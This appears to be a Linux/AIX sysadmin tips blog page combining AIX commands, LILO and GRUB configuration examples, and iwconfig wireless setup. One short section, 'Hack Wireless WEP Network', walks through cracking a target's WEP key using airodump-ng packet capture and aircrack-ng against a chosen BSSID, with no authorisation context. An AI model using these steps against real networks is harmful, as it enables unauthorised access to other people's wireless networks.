Aix Tips

User administration on Aix

mkuser username
To add users

WAP Security Crack

Hack Wireless WEP Network

WEP was intended to provide comparable confidentiality to a traditional wired network (in particular it does not protect users of the network from each other), hence the name. Several serious weaknesses were identified by cryptanalysts — any WEP key can be cracked with readily available software in two minutes or less — and WEP was superseded by Wi-Fi Protected Access (WPA) in 2003, and then by the full IEEE 802.11i standard (also known as WPA2) in 2004. Despite the weaknesses, WEP provides a level of security that can deter casual snooping. Wikipedia

It’s fairly easy to crack a WEP encrypted wireless network. Infact the WEP encryption has some serious flaws in its design, flaws that make it easy and fast tocrack or hack.

Install aircrack-ng - on Debian Etch by:

sudo apt-get install aircrack-ng


Then start aircrack-ng to look for wireless networks:

sudo airodump-ng eth1


Then notice the channel number of the wireless network you want to crack.

Quit aircrack-ng and start it again with med specific channel number to collect packages faster:

sudo airodump-ng -c 4 -w dump eth1


Then wait and let it collect about 500K IVS and the try the do the actual crack:

sudo aircrack-ng -b 0a:0b:0c:0d:0e:0f dump-01.cap


The MAC after the -b option is the BSSID of the target and dump-01.cap the file containing the captured packets.

Aix Commands

Aix Useful Commands


List the licensed program products: lslpp -L
List the defined devices: lsdev -C -H
List the disk drives on the system :lsdev -Cc disk
List the memory on the system :lsdev -Cc memory (MCA)
List the memory on the system :lsattr -El sys0 -a realmem (PCI)
lsattr -El mem0List system resources
lsattr -EHl sys0
List the VPD (Vital Product Data):lscfg -v
Document the tty setup lscfg or smit screen capture F8
Document the print queues qchk -A
Document disk Physical Volumes (PVs)
lspvDocument Logical Volumes (LVs)
lslvDocument Volume Groups (long list)
lsvg -l vgnameDocument Physical Volumes (long list)
lspv -l pvname
Document File Systems lsfs fsname/etc/filesystems
Document disk allocation df
Document mounted file systems mount
Document paging space (70 - 30 rule) lsps -a
Document paging space activation /etc/swapspaces
Document users on the system /etc/passwd
lsuser -a id home ALL
Document users attributes /etc/security/user
Document users limits /etc/security/limits
Document users environments /etc/security/environ
Document login settings (login herald) /etc/security/login.cfg
Document valid group attributes /etc/grouplsgroup ALL
Document system wide profile /etc/profile
Document system wide environment /etc/environment
Document cron jobs /var/spool/cron/crontabs/*
Document skulker changes if used /usr/sbin/skulker
Document system startup file /etc/inittab
Document the hostnames /etc/hosts
Document network printing /etc/hosts.lpd
Document remote login host authority /etc/hosts.equiv

GRUB/LILO BOOT LOADER

A boot loader is the program that sits in your computer's Master Boot Record, or MBR, or at the beginning of your bootable partition. Every operating system uses a boot loader of some sort; without it, the computer would not be able to boot into your operating system.

LILO
LILO (current version is 21.7.5) was the first Linux boot loader, and its name simply stands for “LInux LOader.” You will never need to download it because all Linux distributions come with it.

Let's take a look at an example lilo.conf file:
boot=/dev/hde
map=/boot/map
install=/boot/boot.b
vga=ext
default=linux
lba32
prompt
timeout=50
password=secret
restricted
message=/boot/message-graphic
menu-scheme=wb:bw:wb:bw
image=/boot/vmlinuz
label=linux
root=/dev/hde1
initrd=/boot/initrd.img
append=" hdb=ide-scsi"
read-only
image=/boot/vmlinuz
label=failsafe
root=/dev/hde1
initrd=/boot/initrd.img
append=" hdb=ide-scsi failsafe"
read-only
other=/dev/fd0
label=floppy
unsafe
image=/boot/vmlinuz-2.2
label=linux2.2
root=/dev/hde1
initrd=/boot/initrd-2.2.img
append=" hdb=ide-scsi"
read-only

GRUB

GRUB is a newer boot loader that at one point was a little more advanced than LILO. Its name stands for GRand Unified Bootloader. I find GRUB a little more difficult to use than LILO, and it is no longer any more advanced than LILO is. It offered a graphical boot menu before LILO did, and it was a text ANSI-based menu at that. Now, LILO offers a true graphical boot menu and is just as powerful, if not more so, than GRUB.

GRUB works in a very different way. It comes with an interactive script called grub-install, which is how you should initially configure it, unless you really know what you're doing. You will need to have GRUB installed first; most distributions also come with GRUB, but if not, you can download it from the GNU.org site.

To begin the configuration, issue the following as root:
grub-install /dev/hde

where /dev/hde is the primary drive to boot from. Again, /dev/hde is the primary ATA100 drive, but if you use ATA33 or ATA66 drives, be sure to use /dev/hda.

Once grub-install runs for the first time, it will create a file called /boot/grub/device.mapand will print the contents of that file to the screen. This will list all of the drive devices on your system, including your floppy drive. After running grub-install here, my/boot/grub/device.map file looked like Table A.

Table A

(fd0)	/dev/fd0
(hd0)	/dev/hde
(hd1)	/dev/hdf
(hd2)	/dev/hdgThe device.map file

If this looks correct, you will then need to create the GRUB configuration file:/boot/grub/menu.lst

Example configuration file

# grub.conf generated by anaconda

#

# Note that you do not have to rerun grub after making changes to this file

# NOTICE: You have a /boot partition. This means that

# all kernel and initrd paths are relative to /boot/, eg.

# root (hd0,0)

# kernel /vmlinuz-version ro root=/dev/rootvg/root_lv

# initrd /initrd-version.img

#boot=/dev/sda

default=0

timeout=5

splashimage=(hd0,0)/grub/splash.xpm.gz

hiddenmenu

title Red Hat Enterprise Linux AS (2.6.9-67.EL)

root (hd0,0)

kernel /vmlinuz-2.6.9-67.EL ro root=/dev/rootvg/root_lv rhgb quiet

initrd /initrd-2.6.9-67.EL.img

Wifi Configuration in redhat/suse linux

iwconfig – Wireless Interface configuration utility in REDHAT /SUSELinux

Iwconfig like ifconfig is a Wireless interface configuration utility in Linux.It is used to set the parameters of the network interface which are specific to the wireless operation. Iwconfig may also be used to display the parameters and the wireless statistics. iwconfig extracts these information from /proc/net/wireless file.

Step1: When your run the command "iwconfig" you get the following output

lo no wireless extensions.

wmaster0 no wireless extensions.

wlan0 IEEE 802.11abg ESSID:”xxxxxxxx”
Mode:Managed Frequency:2.437 GHz Access Point: 00:11:22:33:44:55
Bit Rate=54 Mb/s Tx-Power=15 dBm
Retry min limit:7 RTS thr:off Fragment thr=2352 B
Encryption key:xxxx-xxxx-xxxx-xxxx-xxxx-xxxx-xxxx-xxxx-xxxx-xxxx-xxxx-xxxx-xxxx-xxxx-xxxx-xxxx [2] Security mode:open
Power Management:off
Link Quality=96/100 Signal level:-32 dBm Noise level=-69 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0

Step2: Alternatively, you can run the command with an interface name like the following:

Localhost:~ # iwconfig wlan0
wlan0 IEEE 802.11abg ESSID:”xxxxxxxx”
Mode:Managed Frequency:2.437 GHz Access Point: 00:11:22:33:44:55
Bit Rate=54 Mb/s Tx-Power=15 dBm
Retry min limit:7 RTS thr:off Fragment thr=2352 B
Encryption key:xxxx-xxxx-xxxx-xxxx-xxxx-xxxx-xxxx-xxxx-xxxx-xxxx-xxxx-xxxx-xxxx-xxxx-xxxx-xxxx [2] Security mode:open
Power Management:off
Link Quality=96/100 Signal level:-32 dBm Noise level=-69 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0

Tx excessive retries:0 Invalid misc:0 Missed beacon:0

Set operation Mode

The Wireless interface can be set to one of the following different modes which impacts how the device operates:

managed – Node is a client connecting to an Access Point
master – Node acts as an Acces point
secondary – Node acts as a Secondary to a master Access point
ad-hoc – Operates in a One to One Ad-hoc connection to another Wireless device
monitor – Doesn’t connect to any Wireless network but sits and listens on all the packets on a frequency
repeater – Forwards packets between wireless nodes

The mode can be set as follows:

Step3

Localhost:~ # iwconfig mode

For example

localhost :~ # iwconfig wlan0 mode managed

The above sets the interface wlan0 in managed mode.

Set ESSID for Network

Once, the mode is set, we can go ahead and set the essid of the network to which we connect

The ESSID can be set as

Step4

localhost:~ # iwconfig essid

For instance,

localhost:~ # iwconfig wlan0 essid “ABC-WIFI”

Set Wireless Key (WEP)

We can set the WEP Encryption key (64bit or 128 bit)

Step5

localhost:~ # iwconfig key

For example,

localhost :~ # iwconfig wlan0 key 1234-5678-9101-1213

To disable WEP key

localhost :~ # iwconfig wlan0 key off

or to connect to an open network

localhost :~ # iwconfig wlan0 key open

Setting Channel which the interface uses

localhost:~ # iwconfig wlan0 channel

For example,

localhost:~ # iwconfig wlan0 channel auto

or

localhost :~ # iwconfig wlan0 channel 11

to use channel 11.

There are other options that can be set using the iwconfig command. This can be found from the help or man page

localhost:~ # iwconfig –help
Usage: iwconfig [interface]
interface essid {NNN|any|on|off}
interface mode {managed|ad-hoc|master|…}
interface freq N.NNN[k|M|G]
interface channel N
interface bit {N[k|M|G]|auto|fixed}
interface rate {N[k|M|G]|auto|fixed}
interface enc {NNNN-NNNN|off}
interface key {NNNN-NNNN|off}
interface power {period N|timeout N|saving N|off}
interface nickname NNN
interface nwid {NN|on|off}
interface ap {N|off|auto}
interface txpower {NmW|NdBm|off|auto}
interface sens N
interface retry {limit N|lifetime N}
interface rts {N|auto|fixed|off}
interface frag {N|auto|fixed|off}
interface modulation {11g|11a|CCK|OFDMg|…}
interface commit
Check man pages for more details.

Let’s use the above for instance to quickly connect to a Wireless network as follows

localhost:~ #ig wlan0 mode managed
localhost :~ # iwconfig wlan0 essid “ABC-WIFI”
localhost:~ # iwconfig wlan0 key 1111-2222-3333-4444
localhost:~ # iwconfig wlan0 channel auto

The above sets the wlan0 interface to managed mode so it can connect to a Wireless Access point. We then configure an ESSID of a network and then a related key and an auto channel selection.

NOTE: using WEP security is not secure and can be cracked in in minutes. We’ll cover soon the use of WPA/WPA2 for stronger protection from hackers

Hack Wireless WEP Network